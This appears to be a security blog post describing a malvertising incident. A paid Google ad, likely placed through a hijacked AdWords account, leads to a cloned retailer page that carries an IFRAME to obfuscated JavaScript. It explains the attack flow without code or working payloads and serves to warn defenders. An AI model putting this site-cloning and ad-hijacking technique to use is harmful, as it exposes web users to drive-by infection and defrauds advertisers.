A typical approach to spreading malware is to hack a site and then inject an IFRAME pointing towards some obfuscated Javascript that then eventually connects to a site with an exploit.
From the point of view of an attacker, this is fine. But what if the natural traffic for the site isn't enough?
Here's one I came across today with a completely new twist.
In this particular case, our antivirus software came up with an alert for what appeared to be some variant of the JS/Petch trojan. The machine didn't appear to be infected, but I investigated further. (Just to be clear, it wasn't
my machine!)
An analysis of the machine indicated that this particular user had been doing some fairly innocent lunchtime surfing looking for a particular product.. let's say
widgets.
In this case, the user went to Google and search for "widgets" and got the usual load of search results complete with a set of ads along the top and down the side - normal Google AdWords ads. This user then clicked on the top ad apparently promiting a company that we will call
widgetsgb.com.. which is where is gets interesting.
Instead of being taken to widgetsgb.com, Google directed the visitor to another site. This in itself is not unusual, sometimes different domains are used for tracking or whatever. However, in this case the site was completely unrelated.. say
notwidgetsatall.co.uk in which was buried an exact copy of the front page of widgetsgb.com. So the front page of notwidgetsatall.co.uk looked completely normal, but in a subdirectory notwidgetsatall.co.uk/widgets was an exact copy of the other site.
Well, not an
exact copy precisely. This version had some IFRAME goodness pointing to an IP in Germany which had the obfuscated javascript pointing elsewhere. It doesn't really matter where.
What was interesting about this whole thing was that the user had clicked on a paid ad rather then a natural search result. Which means that somebody had to pay for the click... and by the looks of things that somebody had to pay a respectable amount to get the number one position. Of course, the bad guys never pay for anything as it would be uneconomic for them, so the indications are that they were using a hacked AdWords account.
What is strange about this whole thing is the amount of effort that the bad guys put into this.. they targetted a niche site without an awful lot of traffic, made a duplicate and then set up an advertising campaign to drive what was presumably not an awful lot of clicks to their IFRAME.
I guess the AdWords account was picked up with a keylogger installed on another hacked machine. It's the first time I've seen AdWords used in this way, but it shows that the bad guys can squeeze the value out of just about anything.